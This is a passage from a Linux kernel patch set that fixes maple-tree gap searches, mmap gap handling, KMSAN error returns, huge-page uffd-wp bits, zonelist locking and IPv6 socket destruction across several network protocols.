+ 		node = node->slot[0];
+-		node->node_count = 0;
+-		node->request_count = 0;
+ 		requested -= count;
+ 	}
+ 	mas->alloc->total = allocated;
+@@ -4968,7 +4963,8 @@ not_found:
+  * Return: True if found in a leaf, false otherwise.
+  *
+  */
+-static bool mas_rev_awalk(struct ma_state *mas, unsigned long size)
++static bool mas_rev_awalk(struct ma_state *mas, unsigned long size,
++		unsigned long *gap_min, unsigned long *gap_max)
+ {
+ 	enum maple_type type = mte_node_type(mas->node);
+ 	struct maple_node *node = mas_mn(mas);
+@@ -5033,8 +5029,8 @@ static bool mas_rev_awalk(struct ma_state *mas, unsigned long size)
+ 
+ 	if (unlikely(ma_is_leaf(type))) {
+ 		mas->offset = offset;
+-		mas->min = min;
+-		mas->max = min + gap - 1;
++		*gap_min = min;
++		*gap_max = min + gap - 1;
+ 		return true;
+ 	}
+ 
+@@ -5058,10 +5054,10 @@ static inline bool mas_anode_descend(struct ma_state *mas, unsigned long size)
+ {
+ 	enum maple_type type = mte_node_type(mas->node);
+ 	unsigned long pivot, min, gap = 0;
+-	unsigned char offset;
+-	unsigned long *gaps;
+-	unsigned long *pivots = ma_pivots(mas_mn(mas), type);
+-	void __rcu **slots = ma_slots(mas_mn(mas), type);
++	unsigned char offset, data_end;
++	unsigned long *gaps, *pivots;
++	void __rcu **slots;
++	struct maple_node *node;
+ 	bool found = false;
+ 
+ 	if (ma_is_dense(type)) {
+@@ -5069,13 +5065,15 @@ static inline bool mas_anode_descend(struct ma_state *mas, unsigned long size)
+ 		return true;
+ 	}
+ 
+-	gaps = ma_gaps(mte_to_node(mas->node), type);
++	node = mas_mn(mas);
++	pivots = ma_pivots(node, type);
++	slots = ma_slots(node, type);
++	gaps = ma_gaps(node, type);
+ 	offset = mas->offset;
+ 	min = mas_safe_min(mas, pivots, offset);
+-	for (; offset < mt_slots[type]; offset++) {
+-		pivot = mas_safe_pivot(mas, pivots, offset, type);
+-		if (offset && !pivot)
+-			break;
++	data_end = ma_data_end(node, type, pivots, mas->max);
++	for (; offset <= data_end; offset++) {
++		pivot = mas_logical_pivot(mas, pivots, offset, type);
+ 
+ 		/* Not within lower bounds */
+ 		if (mas->index > pivot)
+@@ -5310,6 +5308,9 @@ int mas_empty_area(struct ma_state *mas, unsigned long min,
+ 	unsigned long *pivots;
+ 	enum maple_type mt;
+ 
++	if (min >= max)
++		return -EINVAL;
++
+ 	if (mas_is_start(mas))
+ 		mas_start(mas);
+ 	else if (mas->offset >= 2)
+@@ -5364,6 +5365,9 @@ int mas_empty_area_rev(struct ma_state *mas, unsigned long min,
+ {
+ 	struct maple_enode *last = mas->node;
+ 
++	if (min >= max)
++		return -EINVAL;
++
+ 	if (mas_is_start(mas)) {
+ 		mas_start(mas);
+ 		mas->offset = mas_data_end(mas);
+@@ -5383,7 +5387,7 @@ int mas_empty_area_rev(struct ma_state *mas, unsigned long min,
+ 	mas->index = min;
+ 	mas->last = max;
+ 
+-	while (!mas_rev_awalk(mas, size)) {
++	while (!mas_rev_awalk(mas, size, &min, &max)) {
+ 		if (last == mas->node) {
+ 			if (!mas_rewind_node(mas))
+ 				return -EBUSY;
+@@ -5398,17 +5402,9 @@ int mas_empty_area_rev(struct ma_state *mas, unsigned long min,
+ 	if (unlikely(mas->offset == MAPLE_NODE_SLOTS))
+ 		return -EBUSY;
+ 
+-	/*
+-	 * mas_rev_awalk() has set mas->min and mas->max to the gap values.  If
+-	 * the maximum is outside the window we are searching, then use the last
+-	 * location in the search.
+-	 * mas->max and mas->min is the range of the gap.
+-	 * mas->index and mas->last are currently set to the search range.
+-	 */
+-
+ 	/* Trim the upper limit to the max. */
+-	if (mas->max <= mas->last)
+-		mas->last = mas->max;
++	if (max <= mas->last)
++		mas->last = max;
+ 
+ 	mas->index = mas->last - size + 1;
+ 	return 0;
+diff --git a/mm/backing-dev.c b/mm/backing-dev.c
+index c30419a5e1197..bf5525c2e561a 100644
+--- a/mm/backing-dev.c
++++ b/mm/backing-dev.c
+@@ -380,6 +380,15 @@ static LIST_HEAD(offline_cgwbs);
+ static void cleanup_offline_cgwbs_workfn(struct work_struct *work);
+ static DECLARE_WORK(cleanup_offline_cgwbs_work, cleanup_offline_cgwbs_workfn);
+ 
++static void cgwb_free_rcu(struct rcu_head *rcu_head)
++{
++	struct bdi_writeback *wb = container_of(rcu_head,
++			struct bdi_writeback, rcu);
++
++	percpu_ref_exit(&wb->refcnt);
++	kfree(wb);
++}
++
+ static void cgwb_release_workfn(struct work_struct *work)
+ {
+ 	struct bdi_writeback *wb = container_of(work, struct bdi_writeback,
+@@ -402,11 +411,10 @@ static void cgwb_release_workfn(struct work_struct *work)
+ 	list_del(&wb->offline_node);
+ 	spin_unlock_irq(&cgwb_lock);
+ 
+-	percpu_ref_exit(&wb->refcnt);
+ 	wb_exit(wb);
+ 	bdi_put(bdi);
+ 	WARN_ON_ONCE(!list_empty(&wb->b_attached));
+-	kfree_rcu(wb, rcu);
++	call_rcu(&wb->rcu, cgwb_free_rcu);
+ }
+ 
+ static void cgwb_release(struct percpu_ref *refcnt)
+diff --git a/mm/huge_memory.c b/mm/huge_memory.c
+index b8d654963df87..b20fef29e5bb5 100644
+--- a/mm/huge_memory.c
++++ b/mm/huge_memory.c
+@@ -1805,10 +1805,10 @@ int change_huge_pmd(struct mmu_gather *tlb, struct vm_area_struct *vma,
+ 	if (is_swap_pmd(*pmd)) {
+ 		swp_entry_t entry = pmd_to_swp_entry(*pmd);
+ 		struct page *page = pfn_swap_entry_to_page(entry);
++		pmd_t newpmd;
+ 
+ 		VM_BUG_ON(!is_pmd_migration_entry(*pmd));
+ 		if (is_writable_migration_entry(entry)) {
+-			pmd_t newpmd;
+ 			/*
+ 			 * A protection check is difficult so
+ 			 * just be safe and disable write
+@@ -1822,8 +1822,16 @@ int change_huge_pmd(struct mmu_gather *tlb, struct vm_area_struct *vma,
+ 				newpmd = pmd_swp_mksoft_dirty(newpmd);
+ 			if (pmd_swp_uffd_wp(*pmd))
+ 				newpmd = pmd_swp_mkuffd_wp(newpmd);
+-			set_pmd_at(mm, addr, pmd, newpmd);
++		} else {
++			newpmd = *pmd;
+ 		}
++
++		if (uffd_wp)
++			newpmd = pmd_swp_mkuffd_wp(newpmd);
++		else if (uffd_wp_resolve)
++			newpmd = pmd_swp_clear_uffd_wp(newpmd);
++		if (!pmd_same(*pmd, newpmd))
++			set_pmd_at(mm, addr, pmd, newpmd);
+ 		goto unlock;
+ 	}
+ #endif
+@@ -2647,9 +2655,10 @@ int split_huge_page_to_list(struct page *page, struct list_head *list)
+ 	VM_BUG_ON_FOLIO(!folio_test_large(folio), folio);
+ 
+ 	is_hzp = is_huge_zero_page(&folio->page);
+-	VM_WARN_ON_ONCE_FOLIO(is_hzp, folio);
+-	if (is_hzp)
++	if (is_hzp) {
++		pr_warn_ratelimited("Called split_huge_page for huge zero page\n");
+ 		return -EBUSY;
++	}
+ 
+ 	if (folio_test_writeback(folio))
+ 		return -EBUSY;
+@@ -3233,6 +3242,8 @@ int set_pmd_migration_entry(struct page_vma_mapped_walk *pvmw,
+ 	pmdswp = swp_entry_to_pmd(entry);
+ 	if (pmd_soft_dirty(pmdval))
+ 		pmdswp = pmd_swp_mksoft_dirty(pmdswp);
++	if (pmd_uffd_wp(pmdval))
++		pmdswp = pmd_swp_mkuffd_wp(pmdswp);
+ 	set_pmd_at(mm, address, pvmw->pmd, pmdswp);
+ 	page_remove_rmap(page, vma, true);
+ 	put_page(page);
+diff --git a/mm/khugepaged.c b/mm/khugepaged.c
+index 77a76bcf15f57..ef72d3df4b65b 100644
+--- a/mm/khugepaged.c
++++ b/mm/khugepaged.c
+@@ -561,6 +561,10 @@ static int __collapse_huge_page_isolate(struct vm_area_struct *vma,
+ 			result = SCAN_PTE_NON_PRESENT;
+ 			goto out;
+ 		}
++		if (pte_uffd_wp(pteval)) {
++			result = SCAN_PTE_UFFD_WP;
++			goto out;
++		}
+ 		page = vm_normal_page(vma, address, pteval);
+ 		if (unlikely(!page) || unlikely(is_zone_device_page(page))) {
+ 			result = SCAN_PAGE_NULL;
+diff --git a/mm/kmsan/hooks.c b/mm/kmsan/hooks.c
+index 3807502766a3e..ec0da72e65aa0 100644
+--- a/mm/kmsan/hooks.c
++++ b/mm/kmsan/hooks.c
+@@ -148,35 +148,74 @@ void kmsan_vunmap_range_noflush(unsigned long start, unsigned long end)
+  * into the virtual memory. If those physical pages already had shadow/origin,
+  * those are ignored.
+  */
+-void kmsan_ioremap_page_range(unsigned long start, unsigned long end,
+-			      phys_addr_t phys_addr, pgprot_t prot,
+-			      unsigned int page_shift)
++int kmsan_ioremap_page_range(unsigned long start, unsigned long end,
++			     phys_addr_t phys_addr, pgprot_t prot,
++			     unsigned int page_shift)
+ {
+ 	gfp_t gfp_mask = GFP_KERNEL | __GFP_ZERO;
+ 	struct page *shadow, *origin;
+ 	unsigned long off = 0;
+-	int nr;
++	int nr, err = 0, clean = 0, mapped;
+ 
+ 	if (!kmsan_enabled || kmsan_in_runtime())
+-		return;
++		return 0;
+ 
+ 	nr = (end - start) / PAGE_SIZE;
+ 	kmsan_enter_runtime();
+-	for (int i = 0; i < nr; i++, off += PAGE_SIZE) {
++	for (int i = 0; i < nr; i++, off += PAGE_SIZE, clean = i) {
+ 		shadow = alloc_pages(gfp_mask, 1);
+ 		origin = alloc_pages(gfp_mask, 1);
+-		__vmap_pages_range_noflush(
++		if (!shadow || !origin) {
++			err = -ENOMEM;
++			goto ret;
++		}
++		mapped = __vmap_pages_range_noflush(
+ 			vmalloc_shadow(start + off),
+ 			vmalloc_shadow(start + off + PAGE_SIZE), prot, &shadow,
+ 			PAGE_SHIFT);
+-		__vmap_pages_range_noflush(
++		if (mapped) {
++			err = mapped;
++			goto ret;
++		}
++		shadow = NULL;
++		mapped = __vmap_pages_range_noflush(
+ 			vmalloc_origin(start + off),
+ 			vmalloc_origin(start + off + PAGE_SIZE), prot, &origin,
+ 			PAGE_SHIFT);
++		if (mapped) {
++			__vunmap_range_noflush(
++				vmalloc_shadow(start + off),
++				vmalloc_shadow(start + off + PAGE_SIZE));
++			err = mapped;
++			goto ret;
++		}
++		origin = NULL;
++	}
++	/* Page mapping loop finished normally, nothing to clean up. */
++	clean = 0;
++
++ret:
++	if (clean > 0) {
++		/*
++		 * Something went wrong. Clean up shadow/origin pages allocated
++		 * on the last loop iteration, then delete mappings created
++		 * during the previous iterations.
++		 */
++		if (shadow)
++			__free_pages(shadow, 1);
++		if (origin)
++			__free_pages(origin, 1);
++		__vunmap_range_noflush(
++			vmalloc_shadow(start),
++			vmalloc_shadow(start + clean * PAGE_SIZE));
++		__vunmap_range_noflush(
++			vmalloc_origin(start),
++			vmalloc_origin(start + clean * PAGE_SIZE));
+ 	}
+ 	flush_cache_vmap(vmalloc_shadow(start), vmalloc_shadow(end));
+ 	flush_cache_vmap(vmalloc_origin(start), vmalloc_origin(end));
+ 	kmsan_leave_runtime();
++	return err;
+ }
+ 
+ void kmsan_iounmap_page_range(unsigned long start, unsigned long end)
+diff --git a/mm/kmsan/shadow.c b/mm/kmsan/shadow.c
+index a787c04e9583c..b8bb95eea5e3d 100644
+--- a/mm/kmsan/shadow.c
++++ b/mm/kmsan/shadow.c
+@@ -216,27 +216,29 @@ void kmsan_free_page(struct page *page, unsigned int order)
+ 	kmsan_leave_runtime();
+ }
+ 
+-void kmsan_vmap_pages_range_noflush(unsigned long start, unsigned long end,
+-				    pgprot_t prot, struct page **pages,
+-				    unsigned int page_shift)
++int kmsan_vmap_pages_range_noflush(unsigned long start, unsigned long end,
++				   pgprot_t prot, struct page **pages,
++				   unsigned int page_shift)
+ {
+ 	unsigned long shadow_start, origin_start, shadow_end, origin_end;
+ 	struct page **s_pages, **o_pages;
+-	int nr, mapped;
++	int nr, mapped, err = 0;
+ 
+ 	if (!kmsan_enabled)
+-		return;
++		return 0;
+ 
+ 	shadow_start = vmalloc_meta((void *)start, KMSAN_META_SHADOW);
+ 	shadow_end = vmalloc_meta((void *)end, KMSAN_META_SHADOW);
+ 	if (!shadow_start)
+-		return;
++		return 0;
+ 
+ 	nr = (end - start) / PAGE_SIZE;
+ 	s_pages = kcalloc(nr, sizeof(*s_pages), GFP_KERNEL);
+ 	o_pages = kcalloc(nr, sizeof(*o_pages), GFP_KERNEL);
+-	if (!s_pages || !o_pages)
++	if (!s_pages || !o_pages) {
++		err = -ENOMEM;
+ 		goto ret;
++	}
+ 	for (int i = 0; i < nr; i++) {
+ 		s_pages[i] = shadow_page_for(pages[i]);
+ 		o_pages[i] = origin_page_for(pages[i]);
+@@ -249,10 +251,16 @@ void kmsan_vmap_pages_range_noflush(unsigned long start, unsigned long end,
+ 	kmsan_enter_runtime();
+ 	mapped = __vmap_pages_range_noflush(shadow_start, shadow_end, prot,
+ 					    s_pages, page_shift);
+-	KMSAN_WARN_ON(mapped);
++	if (mapped) {
++		err = mapped;
++		goto ret;
++	}
+ 	mapped = __vmap_pages_range_noflush(origin_start, origin_end, prot,
+ 					    o_pages, page_shift);
+-	KMSAN_WARN_ON(mapped);
++	if (mapped) {
++		err = mapped;
++		goto ret;
++	}
+ 	kmsan_leave_runtime();
+ 	flush_tlb_kernel_range(shadow_start, shadow_end);
+ 	flush_tlb_kernel_range(origin_start, origin_end);
+@@ -262,6 +270,7 @@ void kmsan_vmap_pages_range_noflush(unsigned long start, unsigned long end,
+ ret:
+ 	kfree(s_pages);
+ 	kfree(o_pages);
++	return err;
+ }
+ 
+ /* Allocate metadata for pages allocated at boot time. */
+diff --git a/mm/mmap.c b/mm/mmap.c
+index fe1db604dc49e..14ca259189b77 100644
+--- a/mm/mmap.c
++++ b/mm/mmap.c
+@@ -1565,7 +1565,8 @@ static inline int accountable_mapping(struct file *file, vm_flags_t vm_flags)
+  */
+ static unsigned long unmapped_area(struct vm_unmapped_area_info *info)
+ {
+-	unsigned long length, gap;
++	unsigned long length, gap, low_limit;
++	struct vm_area_struct *tmp;
+ 
+ 	MA_STATE(mas, &current->mm->mm_mt, 0, 0);
+ 
+@@ -1574,12 +1575,29 @@ static unsigned long unmapped_area(struct vm_unmapped_area_info *info)
+ 	if (length < info->length)
+ 		return -ENOMEM;
+ 
+-	if (mas_empty_area(&mas, info->low_limit, info->high_limit - 1,
+-				  length))
++	low_limit = info->low_limit;
++retry:
++	if (mas_empty_area(&mas, low_limit, info->high_limit - 1, length))
+ 		return -ENOMEM;
+ 
+ 	gap = mas.index;
+ 	gap += (info->align_offset - gap) & info->align_mask;
++	tmp = mas_next(&mas, ULONG_MAX);
++	if (tmp && (tmp->vm_flags & VM_GROWSDOWN)) { /* Avoid prev check if possible */
++		if (vm_start_gap(tmp) < gap + length - 1) {
++			low_limit = tmp->vm_end;
++			mas_reset(&mas);
++			goto retry;
++		}
++	} else {
++		tmp = mas_prev(&mas, 0);
++		if (tmp && vm_end_gap(tmp) > gap) {
++			low_limit = vm_end_gap(tmp);
++			mas_reset(&mas);
++			goto retry;
++		}
++	}
++
+ 	return gap;
+ }
+ 
+@@ -1595,7 +1613,8 @@ static unsigned long unmapped_area(struct vm_unmapped_area_info *info)
+  */
+ static unsigned long unmapped_area_topdown(struct vm_unmapped_area_info *info)
+ {
+-	unsigned long length, gap;
++	unsigned long length, gap, high_limit, gap_end;
++	struct vm_area_struct *tmp;
+ 
+ 	MA_STATE(mas, &current->mm->mm_mt, 0, 0);
+ 	/* Adjust search length to account for worst case alignment overhead */
+@@ -1603,12 +1622,31 @@ static unsigned long unmapped_area_topdown(struct vm_unmapped_area_info *info)
+ 	if (length < info->length)
+ 		return -ENOMEM;
+ 
+-	if (mas_empty_area_rev(&mas, info->low_limit, info->high_limit - 1,
++	high_limit = info->high_limit;
++retry:
++	if (mas_empty_area_rev(&mas, info->low_limit, high_limit - 1,
+ 				length))
+ 		return -ENOMEM;
+ 
+ 	gap = mas.last + 1 - info->length;
+ 	gap -= (gap - info->align_offset) & info->align_mask;
++	gap_end = mas.last;
++	tmp = mas_next(&mas, ULONG_MAX);
++	if (tmp && (tmp->vm_flags & VM_GROWSDOWN)) { /* Avoid prev check if possible */
++		if (vm_start_gap(tmp) <= gap_end) {
++			high_limit = vm_start_gap(tmp);
++			mas_reset(&mas);
++			goto retry;
++		}
++	} else {
++		tmp = mas_prev(&mas, 0);
++		if (tmp && vm_end_gap(tmp) > gap) {
++			high_limit = tmp->vm_start;
++			mas_reset(&mas);
++			goto retry;
++		}
++	}
++
+ 	return gap;
+ }
+ 
+diff --git a/mm/page_alloc.c b/mm/page_alloc.c
+index 5cae089639848..69668817fed37 100644
+--- a/mm/page_alloc.c
++++ b/mm/page_alloc.c
+@@ -6599,7 +6599,21 @@ static void __build_all_zonelists(void *data)
+ 	int nid;
+ 	int __maybe_unused cpu;
+ 	pg_data_t *self = data;
++	unsigned long flags;
+ 
++	/*
++	 * Explicitly disable this CPU's interrupts before taking seqlock
++	 * to prevent any IRQ handler from calling into the page allocator
++	 * (e.g. GFP_ATOMIC) that could hit zonelist_iter_begin and livelock.
++	 */
++	local_irq_save(flags);
++	/*
++	 * Explicitly disable this CPU's synchronous printk() before taking
++	 * seqlock to prevent any printk() from trying to hold port->lock, for
++	 * tty_insert_flip_string_and_push_buffer() on other CPU might be
++	 * calling kmalloc(GFP_ATOMIC | __GFP_NOWARN) with port->lock held.
++	 */
++	printk_deferred_enter();
+ 	write_seqlock(&zonelist_update_seq);
+ 
+ #ifdef CONFIG_NUMA
+@@ -6638,6 +6652,8 @@ static void __build_all_zonelists(void *data)
+ 	}
+ 
+ 	write_sequnlock(&zonelist_update_seq);
++	printk_deferred_exit();
++	local_irq_restore(flags);
+ }
+ 
+ static noinline void __init
+@@ -9418,6 +9434,9 @@ static bool pfn_range_valid_contig(struct zone *z, unsigned long start_pfn,
+ 
+ 		if (PageReserved(page))
+ 			return false;
++
++		if (PageHuge(page))
++			return false;
+ 	}
+ 	return true;
+ }
+diff --git a/mm/vmalloc.c b/mm/vmalloc.c
+index d606e53c650e5..d5dc361dc104d 100644
+--- a/mm/vmalloc.c
++++ b/mm/vmalloc.c
+@@ -321,8 +321,8 @@ int ioremap_page_range(unsigned long addr, unsigned long end,
+ 				 ioremap_max_page_shift);
+ 	flush_cache_vmap(addr, end);
+ 	if (!err)
+-		kmsan_ioremap_page_range(addr, end, phys_addr, prot,
+-					 ioremap_max_page_shift);
++		err = kmsan_ioremap_page_range(addr, end, phys_addr, prot,
++					       ioremap_max_page_shift);
+ 	return err;
+ }
+ 
+@@ -613,7 +613,11 @@ int __vmap_pages_range_noflush(unsigned long addr, unsigned long end,
+ int vmap_pages_range_noflush(unsigned long addr, unsigned long end,
+ 		pgprot_t prot, struct page **pages, unsigned int page_shift)
+ {
+-	kmsan_vmap_pages_range_noflush(addr, end, prot, pages, page_shift);
++	int ret = kmsan_vmap_pages_range_noflush(addr, end, prot, pages,
++						 page_shift);
++
++	if (ret)
++		return ret;
+ 	return __vmap_pages_range_noflush(addr, end, prot, pages, page_shift);
+ }
+ 
+diff --git a/net/bridge/br_netfilter_hooks.c b/net/bridge/br_netfilter_hooks.c
+index 9554abcfd5b4e..812bd7e1750b6 100644
+--- a/net/bridge/br_netfilter_hooks.c
++++ b/net/bridge/br_netfilter_hooks.c
+@@ -868,12 +868,17 @@ static unsigned int ip_sabotage_in(void *priv,
+ {
+ 	struct nf_bridge_info *nf_bridge = nf_bridge_info_get(skb);
+ 
+-	if (nf_bridge && !nf_bridge->in_prerouting &&
+-	    !netif_is_l3_master(skb->dev) &&
+-	    !netif_is_l3_slave(skb->dev)) {
+-		nf_bridge_info_free(skb);
+-		state->okfn(state->net, state->sk, skb);
+-		return NF_STOLEN;
++	if (nf_bridge) {
++		if (nf_bridge->sabotage_in_done)
++			return NF_ACCEPT;
++
++		if (!nf_bridge->in_prerouting &&
++		    !netif_is_l3_master(skb->dev) &&
++		    !netif_is_l3_slave(skb->dev)) {
++			nf_bridge->sabotage_in_done = 1;
++			state->okfn(state->net, state->sk, skb);
++			return NF_STOLEN;
++		}
+ 	}
+ 
+ 	return NF_ACCEPT;
+diff --git a/net/bridge/br_switchdev.c b/net/bridge/br_switchdev.c
+index 8f3d76c751dd0..4b3982c368b35 100644
+--- a/net/bridge/br_switchdev.c
++++ b/net/bridge/br_switchdev.c
+@@ -146,6 +146,17 @@ br_switchdev_fdb_notify(struct net_bridge *br,
+ {
+ 	struct switchdev_notifier_fdb_info item;
+ 
++	/* Entries with these flags were created using ndm_state == NUD_REACHABLE,
++	 * ndm_flags == NTF_MASTER( | NTF_STICKY), ext_flags == 0 by something
++	 * equivalent to 'bridge fdb add ... master dynamic (sticky)'.
++	 * Drivers don't know how to deal with these, so don't notify them to
++	 * avoid confusing them.
++	 */
++	if (test_bit(BR_FDB_ADDED_BY_USER, &fdb->flags) &&
++	    !test_bit(BR_FDB_STATIC, &fdb->flags) &&
++	    !test_bit(BR_FDB_ADDED_BY_EXT_LEARN, &fdb->flags))
++		return;
++
+ 	br_switchdev_fdb_populate(br, &item, fdb, NULL);
+ 
+ 	switch (type) {
+diff --git a/net/dccp/dccp.h b/net/dccp/dccp.h
+index 7dfc00c9fb32b..9ddc3a9e89e40 100644
+--- a/net/dccp/dccp.h
++++ b/net/dccp/dccp.h
+@@ -278,6 +278,7 @@ int dccp_rcv_state_process(struct sock *sk, struct sk_buff *skb,
+ int dccp_rcv_established(struct sock *sk, struct sk_buff *skb,
+ 			 const struct dccp_hdr *dh, const unsigned int len);
+ 
++void dccp_destruct_common(struct sock *sk);
+ int dccp_init_sock(struct sock *sk, const __u8 ctl_sock_initialized);
+ void dccp_destroy_sock(struct sock *sk);
+ 
+diff --git a/net/dccp/ipv6.c b/net/dccp/ipv6.c
+index 7a736c352dc4b..b9d7c3dd1cb39 100644
+--- a/net/dccp/ipv6.c
++++ b/net/dccp/ipv6.c
+@@ -1004,6 +1004,12 @@ static const struct inet_connection_sock_af_ops dccp_ipv6_mapped = {
+ 	.sockaddr_len	   = sizeof(struct sockaddr_in6),
+ };
+ 
++static void dccp_v6_sk_destruct(struct sock *sk)
++{
++	dccp_destruct_common(sk);
++	inet6_sock_destruct(sk);
++}
++
+ /* NOTE: A lot of things set to zero explicitly by call to
+  *       sk_alloc() so need not be done here.
+  */
+@@ -1016,17 +1022,12 @@ static int dccp_v6_init_sock(struct sock *sk)
+ 		if (unlikely(!dccp_v6_ctl_sock_initialized))
+ 			dccp_v6_ctl_sock_initialized = 1;
+ 		inet_csk(sk)->icsk_af_ops = &dccp_ipv6_af_ops;
++		sk->sk_destruct = dccp_v6_sk_destruct;
+ 	}
+ 
+ 	return err;
+ }
+ 
+-static void dccp_v6_destroy_sock(struct sock *sk)
+-{
+-	dccp_destroy_sock(sk);
+-	inet6_destroy_sock(sk);
+-}
+-
+ static struct timewait_sock_ops dccp6_timewait_sock_ops = {
+ 	.twsk_obj_size	= sizeof(struct dccp6_timewait_sock),
+ };
+@@ -1049,7 +1050,7 @@ static struct proto dccp_v6_prot = {
+ 	.accept		   = inet_csk_accept,
+ 	.get_port	   = inet_csk_get_port,
+ 	.shutdown	   = dccp_shutdown,
+-	.destroy	   = dccp_v6_destroy_sock,
++	.destroy	   = dccp_destroy_sock,
+ 	.orphan_count	   = &dccp_orphan_count,
+ 	.max_header	   = MAX_DCCP_HEADER,
+ 	.obj_size	   = sizeof(struct dccp6_sock),
+diff --git a/net/dccp/proto.c b/net/dccp/proto.c
+index 85e35c5e88902..a06b5641287a2 100644
+--- a/net/dccp/proto.c
++++ b/net/dccp/proto.c
+@@ -171,12 +171,18 @@ const char *dccp_packet_name(const int type)
+ 
+ EXPORT_SYMBOL_GPL(dccp_packet_name);
+ 
+-static void dccp_sk_destruct(struct sock *sk)
++void dccp_destruct_common(struct sock *sk)
+ {
+ 	struct dccp_sock *dp = dccp_sk(sk);
+ 
+ 	ccid_hc_tx_delete(dp->dccps_hc_tx_ccid, sk);
+ 	dp->dccps_hc_tx_ccid = NULL;
++}
++EXPORT_SYMBOL_GPL(dccp_destruct_common);
++
++static void dccp_sk_destruct(struct sock *sk)
++{
++	dccp_destruct_common(sk);
+ 	inet_sock_destruct(sk);
+ }
+ 
+diff --git a/net/ipv6/af_inet6.c b/net/ipv6/af_inet6.c
+index fb1bf6eb0ff8e..b5309ae87fd79 100644
+--- a/net/ipv6/af_inet6.c
++++ b/net/ipv6/af_inet6.c
+@@ -114,6 +114,7 @@ void inet6_sock_destruct(struct sock *sk)
+ 	inet6_cleanup_sock(sk);
+ 	inet_sock_destruct(sk);
+ }
++EXPORT_SYMBOL_GPL(inet6_sock_destruct);
+ 
+ static int inet6_create(struct net *net, struct socket *sock, int protocol,
+ 			int kern)
+diff --git a/net/ipv6/ping.c b/net/ipv6/ping.c
+index 86c26e48d065a..808983bc2ec9f 100644
+--- a/net/ipv6/ping.c
++++ b/net/ipv6/ping.c
+@@ -23,11 +23,6 @@
+ #include <linux/bpf-cgroup.h>
+ #include <net/ping.h>
+ 
+-static void ping_v6_destroy(struct sock *sk)
+-{
+-	inet6_destroy_sock(sk);
+-}
+-
+ /* Compatibility glue so we can support IPv6 when it's compiled as a module */
+ static int dummy_ipv6_recv_error(struct sock *sk, struct msghdr *msg, int len,
+ 				 int *addr_len)
+@@ -205,7 +200,6 @@ struct proto pingv6_prot = {
+ 	.owner =	THIS_MODULE,
+ 	.init =		ping_init_sock,
+ 	.close =	ping_close,
+-	.destroy =	ping_v6_destroy,
+ 	.pre_connect =	ping_v6_pre_connect,
+ 	.connect =	ip6_datagram_connect_v6_only,
+ 	.disconnect =	__udp_disconnect,
+diff --git a/net/ipv6/raw.c b/net/ipv6/raw.c
+index 9ee1506e23ab1..4fc511bdf176c 100644
+--- a/net/ipv6/raw.c
++++ b/net/ipv6/raw.c
+@@ -1175,8 +1175,6 @@ static void raw6_destroy(struct sock *sk)
+ 	lock_sock(sk);
+ 	ip6_flush_pending_frames(sk);
+ 	release_sock(sk);
+-
+-	inet6_destroy_sock(sk);
+ }
+ 
+ static int rawv6_init_sk(struct sock *sk)
+diff --git a/net/ipv6/rpl.c b/net/ipv6/rpl.c
+index 488aec9e1a74f..d1876f1922255 100644
+--- a/net/ipv6/rpl.c
++++ b/net/ipv6/rpl.c
+@@ -32,7 +32,8 @@ static void *ipv6_rpl_segdata_pos(const struct ipv6_rpl_sr_hdr *hdr, int i)
+ size_t ipv6_rpl_srh_size(unsigned char n, unsigned char cmpri,
+ 			 unsigned char cmpre)
+ {
+-	return (n * IPV6_PFXTAIL_LEN(cmpri)) + IPV6_PFXTAIL_LEN(cmpre);
++	return sizeof(struct ipv6_rpl_sr_hdr) + (n * IPV6_PFXTAIL_LEN(cmpri)) +
++		IPV6_PFXTAIL_LEN(cmpre);
+ }
+ 
+ void ipv6_rpl_srh_decompress(struct ipv6_rpl_sr_hdr *outhdr,
+diff --git a/net/ipv6/tcp_ipv6.c b/net/ipv6/tcp_ipv6.c
+index ea1ecf5fe947c..81afb40bfc0bb 100644
+--- a/net/ipv6/tcp_ipv6.c
++++ b/net/ipv6/tcp_ipv6.c
+@@ -1951,12 +1951,6 @@ static int tcp_v6_init_sock(struct sock *sk)
+ 	return 0;
+ }
+ 
+-static void tcp_v6_destroy_sock(struct sock *sk)
+-{
+-	tcp_v4_destroy_sock(sk);
+-	inet6_destroy_sock(sk);
+-}
+-
+ #ifdef CONFIG_PROC_FS
+ /* Proc filesystem TCPv6 sock list dumping. */
+ static void get_openreq6(struct seq_file *seq,
+@@ -2149,7 +2143,7 @@ struct proto tcpv6_prot = {
+ 	.accept			= inet_csk_accept,
+ 	.ioctl			= tcp_ioctl,
+ 	.init			= tcp_v6_init_sock,
+-	.destroy		= tcp_v6_destroy_sock,
++	.destroy		= tcp_v4_destroy_sock,
+ 	.shutdown		= tcp_shutdown,
+ 	.setsockopt		= tcp_setsockopt,
+ 	.getsockopt		= tcp_getsockopt,
+diff --git a/net/ipv6/udp.c b/net/ipv6/udp.c
+index 17d721a6add72..0b8127988adb7 100644
+--- a/net/ipv6/udp.c
++++ b/net/ipv6/udp.c
+@@ -1668,8 +1668,6 @@ void udpv6_destroy_sock(struct sock *sk)
+ 			udp_encap_disable();
+ 		}
+ 	}
+-
+-	inet6_destroy_sock(sk);
+ }
+ 
+ /*
+diff --git a/net/l2tp/l2tp_ip6.c b/net/l2tp/l2tp_ip6.c
+index 9db7f4f5a4414..5137ea1861ce2 100644
+--- a/net/l2tp/l2tp_ip6.c
++++ b/net/l2tp/l2tp_ip6.c
+@@ -257,8 +257,6 @@ static void l2tp_ip6_destroy_sock(struct sock *sk)
+ 
+ 	if (tunnel)
+ 		l2tp_tunnel_delete(tunnel);
+-
+-	inet6_destroy_sock(sk);
+ }
+ 
+ static int l2tp_ip6_bind(struct sock *sk, struct sockaddr *uaddr, int addr_len)
+diff --git a/net/mptcp/protocol.c b/net/mptcp/protocol.c
+index 19f35869a164a..b1bbb0b75a13c 100644
+--- a/net/mptcp/protocol.c
++++ b/net/mptcp/protocol.c
+@@ -3939,12 +3939,6 @@ static const struct proto_ops mptcp_v6_stream_ops = {
+ 
+ static struct proto mptcp_v6_prot;
+ 
+-static void mptcp_v6_destroy(struct sock *sk)
+-{
+-	mptcp_destroy(sk);
+-	inet6_destroy_sock(sk);
+-}
+-
+ static struct inet_protosw mptcp_v6_protosw = {
+ 	.type		= SOCK_STREAM,
+ 	.protocol	= IPPROTO_MPTCP,
+@@ -3960,7 +3954,6 @@ int __init mptcp_proto_v6_init(void)
+ 	mptcp_v6_prot = mptcp_prot;
+ 	strcpy(mptcp_v6_prot.name, "MPTCPv6");
+ 	mptcp_v6_prot.slab = NULL;
+-	mptcp_v6_prot.destroy = mptcp_v6_destroy;
